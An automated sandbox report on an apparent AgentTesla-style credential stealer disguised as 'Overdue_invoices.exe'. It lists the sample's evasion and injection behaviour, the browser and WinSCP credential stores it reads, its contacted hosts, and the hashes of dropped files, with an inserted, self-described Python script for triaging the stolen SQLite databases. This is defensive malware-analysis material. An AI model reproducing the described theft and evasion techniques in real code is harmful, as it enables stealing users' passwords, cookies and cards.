    Source: C:\Users\user\Desktop\Overdue_invoices.exe | Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
    Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 2140 | Thread sleep time: -30000s >= -30000s
    Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 3492 | Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 6200 | Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 6200 | Thread sleep time: -100000s >= -30000s
    Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 6200 | Thread sleep time: -99875s >= -30000s
    Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 6200 | Thread sleep time: -99766s >= -30000s
    Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 6200 | Thread sleep time: -99657s >= -30000s
    Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 6200 | Thread sleep time: -99500s >= -30000s
    Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 6200 | Thread sleep time: -99391s >= -30000s
    Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 6200 | Thread sleep time: -99281s >= -30000s
    Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 6200 | Thread sleep time: -99172s >= -30000s
    Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 6200 | Thread sleep time: -99063s >= -30000s
    Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 6200 | Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Users\user\Desktop\Overdue_invoices.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
    Source: Overdue_invoices.exe, 00000001.00000002.629727948.00000000056A0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: Overdue_invoices.exe, 00000001.00000002.625516000.0000000001562000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{
    Source: Overdue_invoices.exe, 00000001.00000002.629727948.00000000056A0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: Overdue_invoices.exe, 00000001.00000002.629727948.00000000056A0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: Overdue_invoices.exe, 00000000.00000002.230153111.0000000000B83000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: Overdue_invoices.exe, 00000001.00000002.629727948.00000000056A0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
    Source: C:\Users\user\Desktop\Overdue_invoices.exe | Process token adjusted: Debug
    Source: C:\Users\user\Desktop\Overdue_invoices.exe | Memory allocated: page read and write | page guard

    HIPS / PFW / Operating System Protection Evasion:

    Injects a PE file into a foreign processes
    Source: C:\Users\user\Desktop\Overdue_invoices.exe | Memory written: C:\Users\user\Desktop\Overdue_invoices.exe base: 400000 value starts with: 4D5A
    Source: C:\Users\user\Desktop\Overdue_invoices.exe | Process created: C:\Users\user\Desktop\Overdue_invoices.exe C:\Users\user\Desktop\Overdue_invoices.exe
    Source: Overdue_invoices.exe, 00000001.00000002.625796287.0000000001AD0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
    Source: Overdue_invoices.exe, 00000001.00000002.625796287.0000000001AD0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
    Source: Overdue_invoices.exe, 00000001.00000002.625796287.0000000001AD0000.00000002.00000001.sdmp | Binary or memory string: Progman
    Source: Overdue_invoices.exe, 00000001.00000002.625796287.0000000001AD0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
    Source: C:\Users\user\Desktop\Overdue_invoices.exe | Queries volume information: C:\Users\user\Desktop\Overdue_invoices.exe VolumeInformation
    Source: C:\Users\user\Desktop\Overdue_invoices.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
    Source: C:\Users\user\Desktop\Overdue_invoices.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
    Source: C:\Users\user\Desktop\Overdue_invoices.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
    Source: C:\Users\user\Desktop\Overdue_invoices.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
    Source: C:\Users\user\Desktop\Overdue_invoices.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
    Source: C:\Users\user\Desktop\Overdue_invoices.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
    Source: C:\Users\user\Desktop\Overdue_invoices.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

    Stealing of Sensitive Information:

    Yara detected AgentTesla
    Source: Yara match | File source: Process Memory Space: Overdue_invoices.exe PID: 6020, type: MEMORY
    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
    Source: C:\Users\user\Desktop\Overdue_invoices.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
    Tries to harvest and steal browser information (history, passwords, etc)
    Source: C:\Users\user\Desktop\Overdue_invoices.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
    Source: C:\Users\user\Desktop\Overdue_invoices.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web data
    Source: C:\Users\user\Desktop\Overdue_invoices.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

    Remote Access Functionality:

    Yara detected AgentTesla
    Source: Yara match | File source: Process Memory Space: Overdue_invoices.exe PID: 6020, type: MEMORY

    Mitre Att&ck Matrix

    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
    Valid Accounts | Windows Management Instrumentation 11 | Path Interception | Process Injection 112 | Masquerading 1 | OS Credential Dumping 1 | Security Software Discovery 11 | Remote Services | Input Capture 21 | Exfiltration Over Other Network Medium | Encrypted Channel 12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
    Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion 3 | Input Capture 21 | Virtualization/Sandbox Evasion 3 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Non-Standard Port 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
    Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools 1 | Credentials in Registry 1 | Process Discovery 11 | SMB/Windows Admin Shares | Data from Local System 1 | Automated Exfiltration | Ingress Tool Transfer 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
    Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 112 | NTDS | Application Window Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol 2 | SIM Card Swap | | Carrier Billing Fraud
    Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information 11 | LSA Secrets | Remote System Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol 13 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
    Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing 1 | Cached Domain Credentials | System Network Configuration Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
    External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | System Information Discovery 23 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact



    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    Source | Detection | Scanner | Label
    Overdue_invoices.exe | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Generic

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    Source | Detection | Scanner | Label
    1.2.Overdue_invoices.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1106066

    Domains

    No Antivirus matches

    URLs


    Domains and IPs

    Contacted Domains

    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    github.map.fastly.net | 151.101.0.133 | true | false | | unknown
    smtp.gmail.com | 108.177.119.109 | true | false | | high
    icanhazip.com | 147.75.47.199 | true | false | | high
    raw.githubusercontent.com | unknown | unknown | true | | unknown

    Contacted URLs

    Name | Malicious | Antivirus Detection | Reputation
    http://icanhazip.com/ | false | | high
    http://193.239.147.103/base/D87080E8818FCC40A45F948026A84297.html | false | Avira URL Cloud: safe | unknown

              URLs from Memory and Binaries

                                  low
                                  http://www.msn.com/de-ch/Overdue_invoices.exe, 00000001.00000002.626238990.0000000003150000.00000004.00000001.sdmpfalse
                                    high
                                    http://www.msn.com/?ocid=iehpOverdue_invoices.exe, 00000001.00000002.625659765.00000000015AD000.00000004.00000020.sdmp, Overdue_invoices.exe, 00000001.00000002.626238990.0000000003150000.00000004.00000001.sdmpfalse
                                      high
                                      http://crl.pki.goog/GTS1O1core.crl0Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_SlOverdue_invoices.exe, 00000001.00000002.626663289.0000000003236000.00000004.00000001.sdmpfalse
                                        high
                                        http://icanhazip.comOverdue_invoices.exe, 00000001.00000002.626165081.0000000003116000.00000004.00000001.sdmpfalse
                                          high
                                          http://193.239.147.103Overdue_invoices.exe, 00000000.00000002.230384205.00000000028E1000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://crl.pki.goog/gsr2/gsr2.crl0?Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameOverdue_invoices.exe, 00000000.00000002.230384205.00000000028E1000.00000004.00000001.sdmp, Overdue_invoices.exe, 00000001.00000002.625927186.0000000003081000.00000004.00000001.sdmpfalse
                                            high
                                            http://smtp.gmail.comOverdue_invoices.exe, 00000001.00000002.626846042.000000000328B000.00000004.00000001.sdmpfalse
                                              high
                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Overdue_invoices.exe, 00000001.00000003.239380951.00000000041CE000.00000004.00000001.sdmp, browserCreditCards.1.drfalse
                                                high
                                                https://i.imgur.com/9sS1RPE.pngOverdue_invoices.exe, 00000001.00000002.624606390.0000000000402000.00000040.00000001.sdmpfalse
                                                  high
                                                  https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Overdue_invoices.exe, 00000001.00000003.239380951.00000000041CE000.00000004.00000001.sdmp, browserCreditCards.1.drfalse
                                                    high

                                                    Contacted IPs


                                                    Public

IP               Domain   Country            ASN    ASN Name        Malicious
193.239.147.103  unknown  Brunei Darussalam  35913  DEDIPATH-LLCUS  false
147.75.47.199    unknown  Switzerland        54825  PACKETUS        false
151.101.0.133    unknown  United States      54113  FASTLYUS        false
108.177.119.109  unknown  United States      15169  GOOGLEUS        false

                                                    General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 344973
Start date: 27.01.2021
Start time: 15:14:11
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 25s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Overdue_invoices.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/6@4/4
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 21
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                    • Excluded IPs from analysis (whitelisted): 104.43.139.144, 40.88.32.150, 51.104.144.132, 23.210.248.85, 95.101.22.224, 95.101.22.216, 20.54.26.129, 95.101.27.163, 95.101.27.142, 51.103.5.186, 51.104.139.180, 52.155.217.156
                                                    • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, wns.notify.windows.com.akadns.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, par02p.wns.notify.trafficmanager.net, vip2-par02p.wns.notify.trafficmanager.net
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • VT rate limit hit for: /opt/package/joesandbox/database/analysis/344973/sample/Overdue_invoices.exe

                                                    Simulations

                                                    Behavior and APIs

Time      Type             Description
15:15:12  API Interceptor  11x Sleep call for process: Overdue_invoices.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs


                                                    Domains


                                                    ASN


                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Overdue_invoices.exe.log
Process: C:\Users\user\Desktop\Overdue_invoices.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1039
Entropy (8bit): 5.365622957937216
Encrypted: false
SSDEEP: 24:MLU84qpE4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7GE4Ks:Mgv2HKXwYHKhQnoPtHoxHhAHKzvGHKs
MD5: 8661DEF1A785B33817416A73C5B2C3DD
SHA1: 3341588F1C06BFFDDCCCF2EDE4F62D6D5F7AACA9
SHA-256: BF8FD626E9B119BF1F5045CAB9B6A2A773FB44ADCCB303B807CF650CE50758DD
SHA-512: 035155C37E203345617D0679BC0F544E492BA0FBCC8CD42DA91FA721011BAE29095DE36F5D54CC08FF31B70DBD0FEB3DA82DDC9DD36F2D37B7EFE822DA5FBACC
Malicious: true
Reputation: moderate, very likely benign file
                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutra
                                                    C:\Users\user\AppData\Local\Temp\TMP_4728
                                                    Process:C:\Users\user\Desktop\Overdue_invoices.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):50
                                                    Entropy (8bit):4.63572875064339
                                                    Encrypted:false
                                                    SSDEEP:3:Nm1WXp5vqTSVKty:01WXpFqTDk
                                                    MD5:B8D917424EC0E1B5CED53A0A590E0018
                                                    SHA1:E01F04CBE64F80F7B8FD594B720AD27C2B36B9CC
                                                    SHA-256:193D0458703DC296C08E19CDA97C5620AFB32953537FE8F0AF9B8316E75EBD53
                                                    SHA-512:B5AD66175D58D1C797102F53B8D110451AE2CA07E3AF23E11CB7A50A5CCBF335B375F7FE90EF818DB008472655544FCE85571868D5516B0264520475CE4B21BC
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview: 6020,C:\Users\user\Desktop\Overdue_invoices.exe..
                                                    C:\Users\user\AppData\Local\Temp\TMP_Cookies
                                                    Process:C:\Users\user\Desktop\Overdue_invoices.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.6970840431455908
                                                    Encrypted:false
                                                    SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                    MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                    SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                    SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                    SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Temp\TMP_pass
                                                    Process:C:\Users\user\Desktop\Overdue_invoices.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.792852251086831
                                                    Encrypted:false
                                                    SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                    MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                    SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                    SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                    SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Temp\browserCreditCards
                                                    Process:C:\Users\user\Desktop\Overdue_invoices.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                    Category:dropped
                                                    Size (bytes):73728
                                                    Entropy (8bit):1.1874185457069584
                                                    Encrypted:false
                                                    SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                    MD5:72A43D390E478BA9664F03951692D109
                                                    SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                    SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                    SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Temp\tmp99EA0x.tmp
                                                    Process:C:\Users\user\Desktop\Overdue_invoices.exe
                                                    File Type:UTF-8 Unicode text, with CRLF, LF line terminators
                                                    Category:dropped
                                                    Size (bytes):2689
                                                    Entropy (8bit):5.347685360604738
                                                    Encrypted:false
                                                    SSDEEP:48:8bAIVIDAlG33HPrLPFpsPa1tPLpnPVTPUnP2PHydVWAgH8wAcxWClwBNxhXv2ilZ:85VIDLHzLNpsKtDpndT8nuPHydVWhcwU
                                                    MD5:A8307959CD38001AEC8D022D52094D23
                                                    SHA1:BDE6320753A11E17291CBF3153DC009E65B0E449
                                                    SHA-256:EDC211E8DD994F7F9AA7F947AF81504D32404711B84BCD180CDD216123B3043A
                                                    SHA-512:B006429E1E383ED11E2BF3DE2A8349D6EF8DAF0D699AF66E44032E83C61DDA793FC3D2B5D05102C544D935591B2FE9364FA69213F89C35496935F47AC2E59A76
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview: ==========| Panda Logger - System Details |==========...Computer Name: 494126..Username: user..Country Name: United States..System date and time: 1/27/2021 3:15:12 PM..Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..Framework: 4.0.30319.42000..Operating System: Microsoft Windows 10 Pro..Process Elevated:True..IP address: 84.17.52.74.....===== Installed Programs/Softwares =====..[+] Google Chrome..[+] Microsoft Office Professional Plus 2016..[+] Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501..[+] Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005..[+] Microsoft Visual C++ 2010 x86 Redistributable - 10.0.30319..[+] Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702..[+] Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702..[+] Java 8 Update 211..[+] Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030..[+] Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702..[+] Java Auto Updater..[+] Google Update Helper..[+] Microsoft
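Three of the files the sample writes to %TEMP% (TMP_Cookies, TMP_pass, browserCreditCards) are SQLite databases, and the report's "last written using SQLite version 3032001" comes straight from the 100-byte SQLite file header. The following is an added triage example, not code from the report or from the analysed sample: it decodes the header fields (page size and the SQLITE_VERSION_NUMBER, so 3032001 reads as 3.32.1), lists the tables read-only, and matches them against the table names of the Chromium credential stores. The table-name signature set, the store labels, and the "Login Data" database it builds (with fake rows) are constructed assumptions for the example, not artefacts of the sandbox run.

```python
"""Added example (not from the report): triage SQLite databases a stealer staged in %TEMP%.

Reads the 100-byte SQLite header the report's "File Type" line is derived from
(page size, SQLITE_VERSION_NUMBER such as 3032001 = 3.32.1), lists the tables
read-only, and matches them against Chromium credential-store schemas.
Hypothetical code; the 'Login Data' database it builds is constructed here and
holds fake rows, not data from the sandbox run.
"""
import os
import sqlite3
import struct
import tempfile

# Table names that identify a copied Chromium store (assumed signature set)
KNOWN_STORES = {
    "Login Data (saved passwords)": {"logins"},
    "Cookies": {"cookies"},
    "Web Data (autofill / credit cards)": {"credit_cards", "autofill"},
}


def decode_sqlite_version(n: int) -> str:
    """SQLITE_VERSION_NUMBER is X*1000000 + Y*1000 + Z, so 3032001 -> '3.32.1'."""
    return f"{n // 1000000}.{(n // 1000) % 1000}.{n % 1000}"


def parse_sqlite_header(hdr: bytes) -> dict:
    """Decode the fields of the 100-byte database header that matter for triage."""
    if hdr[:16] != b"SQLite format 3\x00":
        raise ValueError("not a SQLite 3 database")
    page_size = struct.unpack_from(">H", hdr, 16)[0]
    page_size = 65536 if page_size == 1 else page_size      # the value 1 encodes 65536
    version_number = struct.unpack_from(">I", hdr, 96)[0]   # library that last wrote the file
    return {"page_size": page_size, "sqlite_version": decode_sqlite_version(version_number)}


def classify_dropped_db(path: str) -> dict:
    """Header fields, table list, matching Chromium store and row counts of matched tables."""
    with open(path, "rb") as fh:
        info = parse_sqlite_header(fh.read(100))
    con = sqlite3.connect(f"file:{path}?mode=ro", uri=True)   # never write to evidence
    try:
        tables = {row[0] for row in con.execute("SELECT name FROM sqlite_master WHERE type='table'")}
        store = next((name for name, sig in KNOWN_STORES.items() if sig & tables), "unknown")
        hits = tables & KNOWN_STORES.get(store, set())
        rows = {t: con.execute(f'SELECT count(*) FROM "{t}"').fetchone()[0] for t in sorted(hits)}
    finally:
        con.close()
    info.update(tables=sorted(tables), store=store, rows=rows)
    return info


def library_version() -> str:
    """Version string the local SQLite library stamps into every file it writes."""
    return "%d.%d.%d" % sqlite3.sqlite_version_info


def build_sample_login_data(path: str) -> None:
    """Constructed stand-in for a copied Chromium 'Login Data' file (fake rows)."""
    con = sqlite3.connect(path)
    con.executescript("""
        CREATE TABLE logins (origin_url TEXT, username_value TEXT, password_value BLOB);
        INSERT INTO logins VALUES ('https://mail.example.test/', 'alice', X'00');
        INSERT INTO logins VALUES ('https://bank.example.test/', 'bob', X'00');
        CREATE TABLE meta (key TEXT, value TEXT);
    """)
    con.commit()
    con.close()


def demo() -> dict:
    """Build the constructed database in a temp dir, classify it, clean up."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "TMP_pass")
        build_sample_login_data(path)
        return classify_dropped_db(path)


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Run against a real dropped file, the row count of the matched table is what tells you how many saved credentials, cookies or cards were staged for exfiltration; opening the file with `mode=ro` keeps the evidence hash intact.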

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):5.607365895665976
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Windows Screen Saver (13104/52) 0.07%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    File name:Overdue_invoices.exe
                                                    File size:100864
                                                    MD5:afa35ee8f27c8a6661219bccb198fd9b
                                                    SHA1:8b86a3066a24586bd5d17ce45ce8bd7984079af0
                                                    SHA256:2d2c26b0f3308bda9e00913401761b8b5026edccfbe12bce7a72cd2d324c2f45
                                                    SHA512:6b2242cad79cf4aea483f6e56d25ca60a8fe5788ae298bd69ae0b150092ebb22a0d2c89d93d33733248a47d6b2077cd2b67d3163af124521a570157974af2419
                                                    SSDEEP:3072:YMVu0mNieZzQ5mPagIWSPahXjYktx0gxOytswL+f66fQG8zJGVT4qG9:YHZf
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...W..`.........."...0..x............... ........@.. ..............................rf....`................................

                                                    File Icon

                                                    Icon Hash:00828e8e8686b000

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x4197be
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                                    Time Stamp:0x6010A357 [Tue Jan 26 23:18:47 2021 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:v4.0.30319
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
